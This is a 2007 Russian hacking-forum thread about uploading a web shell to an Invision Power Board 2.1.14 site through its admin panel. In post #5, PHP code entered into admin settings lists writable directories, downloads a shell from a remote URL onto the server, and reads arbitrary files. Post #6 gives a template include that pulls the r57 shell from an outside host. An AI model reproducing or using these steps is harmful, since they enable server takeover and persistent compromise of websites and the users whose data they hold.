ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Заливка шелла в ipb 2.1.14, имея доступ в админку
  #1  
Старый 30.03.2007, 18:47
Аватар для Rosssi
Rosssi
Новичок
Регистрация: 13.03.2007
Сообщений: 11
Провел на форуме:
116353

Репутация: -2
По умолчанию Заливка шелла в ipb 2.1.14, имея доступ в админку

Везде искал так и ненашел способа.
Имею полный доступ к админке ipb 2.1.14.
Через смайлики не заливается что делать ?
 

  #2  
Старый 30.03.2007, 18:55
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

http://www.someshit.net/showthread.php?p=357#post357
 

  #3  
Старый 01.04.2007, 00:41
Аватар для win32_reverse
win32_reverse
Новичок
Регистрация: 21.01.2007
Сообщений: 4
Провел на форуме:
13478

Репутация: 0
По умолчанию

попробуй через инклудинг, помоему это сработает
 

  #4  
Старый 02.04.2007, 03:25
Аватар для pogant
pogant
Познающий
Регистрация: 24.06.2006
Сообщений: 35
Провел на форуме:
85679

Репутация: 10
По умолчанию

лей через настройки.
 

  #5  
Старый 02.04.2007, 09:34
Аватар для GrAmOzEkA
GrAmOzEkA
Участник форума
Регистрация: 25.06.2006
Сообщений: 220
Провел на форуме:
2052669

Репутация: 178
По умолчанию

Заходиш в настройки -> выбираеш любую настройку -> добавить настройку.
В поле php код вбиваеш:
Цитата:
$d = dir(".");
echo "Path: " . realpath($d->path) . "<br />\n";
while (false !== ($entry = $d->read())) {
if (is_dir(realpath($d->path).'/'.$entry)) {
echo "[".$entry."]".(is_writable(realpath($d->path).'/'.$entry)
? '[w]' : '').
"<br />\n";
} else {
echo $entry.(is_writable(realpath($d->path).'/'.$entry) ?
'[w]' : '')."<br />\n";
}
}
$d->close();
Потом ищиш диру где разрешена запись и таким же способом загружаеш шелл, вот код для удалённой загрузки:
Цитата:
$linky="http://site.ru/shell.php";
$saved="/путь_до_расширенной_диры/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from);
У меня такое всегда работает даже когда SafeMode On
Если хочеш прочитать какой либо файл ,то вбиваеш в поле php код следующее:

Цитата:
echo nl2br(htmlspecialchars(implode('', file('/путь_до_файла/file.php'))));

Последний раз редактировалось GrAmOzEkA; 02.04.2007 в 09:41..
 

  #6  
Старый 02.04.2007, 15:43
Аватар для FQziT
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию

Для особенно "пряморуких" людей, у которых не получается ни один из вышеперечисленных способов, а шелл заинклудить очень хочется )) Есть вариант работающий со всеми версиями IPB.
В основном шаблоне форума (Board Header and Footer Wrapper) можно вот так заинклудить
Код:
<!--exec.url="http://underwater.xtoolz.ru/shell/r57.txt"-->
Так же и локальные файлы инклудить можно только с помощью exec.file.
 

  #7  
Старый 02.04.2007, 16:17
Аватар для Rosssi
Rosssi
Новичок
Регистрация: 13.03.2007
Сообщений: 11
Провел на форуме:
116353

Репутация: -2
По умолчанию

Cпасибо ребят! Я как 2 дня разобрался с этим Вся инфа тут http://www.someshit.net/showthread.php?p=357#post357!
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Заливка шелла на Ipb 2.1.7 Thrasher Форумы 15 14.01.2007 14:51
Возможно ли зайти в админку в Ipb 2.2 Имея на руках бекап базы форума? cardons Форумы 5 04.01.2007 23:40
Заливка шелла в Ipb не имея доступа к админке... ~Real F@ck!~ Форумы 14 08.11.2006 05:01
Как можно зайти в админку, имея куки администратора в форуме IPB v1.3-2.0? san40 Форумы 5 31.01.2005 23:50



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ